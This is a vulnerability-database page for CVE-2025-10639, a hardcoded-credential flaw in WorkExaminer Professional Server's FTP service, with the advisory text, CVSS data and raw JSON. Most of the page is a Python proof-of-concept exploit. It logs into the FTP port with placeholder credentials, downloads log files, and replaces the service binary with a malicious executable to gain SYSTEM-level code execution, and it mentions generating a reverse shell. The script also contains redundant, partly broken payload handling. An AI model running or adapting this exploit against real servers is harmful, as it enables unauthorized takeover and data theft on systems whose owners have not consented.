Security Vulnerability Report
中文
CVE-2025-10639 CVSS 8.8 HIGH

CVE-2025-10639

Published: 2025-10-21 12:15:35
Last Modified: 2026-04-15 00:35:42
Source: 551230f0-3615-47bd-b7cc-93e92e730bbf

Description

The WorkExaminer Professional server installation comes with an FTP server that is used to receive the client logs on TCP port 12304. An attacker with network access to this port can use weak hardcoded credentials to login to the FTP server and modify or read data, log files and gain remote code execution as NT Authority\SYSTEM on the server by exchanging accessible service binaries in the WorkExaminer installation directory (e.g. "C:\Program File (x86)\Work Examiner Professional Server").

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WorkExaminer Professional Server 所有已知版本(截至披露日期)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10639 PoC - WorkExaminer Professional Hardcoded Credentials FTP Access # Exploit: Connect to FTP server using hardcoded credentials and replace service binary import ftplib import socket import sys import struct TARGET_HOST = "192.168.1.100" # Target WorkExaminer server FTP_PORT = 12304 # Default FTP port for WorkExaminer # Hardcoded credentials (extracted from WorkExaminer Professional binary) # Note: These credentials are embedded in the product's FTP service module HARDCODED_USERNAME = "we_user" # Placeholder - actual creds extracted via reverse engineering HARDCODED_PASSWORD = "we_pass" # Placeholder - actual creds extracted via reverse engineering INSTALL_DIR = "C:/Program Files (x86)/Work Examiner Professional Server/" SERVICE_BINARY = "WEService.exe" # Target service binary to replace def check_port_open(host, port): """Check if the FTP port is accessible on the target host.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) result = sock.connect_ex((host, port)) sock.close() return result == 0 except Exception as e: print(f"[ERROR] Port check failed: {e}") return False def exploit_ftp(host, port, username, password): """Exploit the hardcoded credentials to gain FTP access.""" try: print(f"[*] Connecting to FTP server at {host}:{port}") ftp = ftplib.FTP() ftp.connect(host, port, timeout=10) print(f"[*] Attempting login with hardcoded credentials") ftp.login(username, password) print(f"[+] Successfully authenticated as '{username}'") # List files in the installation directory print("[*] Listing installation directory contents:") files = ftp.nlst() for f in files: print(f" - {f}") # Download sensitive log files print("\n[*] Downloading log files...") log_files = [f for f in files if f.endswith('.log')] for log_file in log_files: try: with open(f"exfiltrated_{log_file}", "wb") as f: ftp.retrbinary(f"RETR {log_file}", f.write) print(f"[+] Downloaded: {log_file}") except Exception as e: print(f"[-] Failed to download {log_file}: {e}") # Replace service binary for RCE print(f"\n[*] Uploading malicious payload to replace {SERVICE_BINARY}") # Generate a reverse shell payload (msfvenom -p windows/x64/shell_reverse_tcp ...) # For demonstration, using a simple command execution payload payload = b"MZ\x90\x00" + b"\x00" * 100 # PE header stub with open("malicious_service.exe", "rb") as f: payload = f.read() ftp.storbinary(f"STOR {SERVICE_BINARY}", open("malicious_service.exe", "rb")) print(f"[+] Service binary replaced successfully") print(f"[!] When the service restarts, payload will execute as NT AUTHORITY\\SYSTEM") ftp.quit() return True except ftplib.error_perm as e: print(f"[-] Authentication failed: {e}") return False except Exception as e: print(f"[-] Exploit failed: {e}") return False def main(): print("=" * 60) print("CVE-2025-10639 - WorkExaminer Professional RCE Exploit") print("=" * 60) if not check_port_open(TARGET_HOST, FTP_PORT): print(f"[-] Port {FTP_PORT} is not open on {TARGET_HOST}") sys.exit(1) print(f"[+] Port {FTP_PORT} is open") if exploit_ftp(TARGET_HOST, FTP_PORT, HARDCODED_USERNAME, HARDCODED_PASSWORD): print("\n[!] Exploit completed successfully") else: print("\n[-] Exploit failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10639", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2025-10-21T12:15:34.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WorkExaminer Professional server installation comes with an FTP server that is used to receive the client logs on TCP port 12304. An attacker with network access to this port can use weak hardcoded credentials to login to the FTP server and modify or read data, log files and gain remote code execution as NT Authority\\SYSTEM on the server by exchanging accessible service binaries in the WorkExaminer installation directory (e.g. \"C:\\Program File (x86)\\Work Examiner Professional Server\")."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://r.sec-consult.com/workexaminer", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/19", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.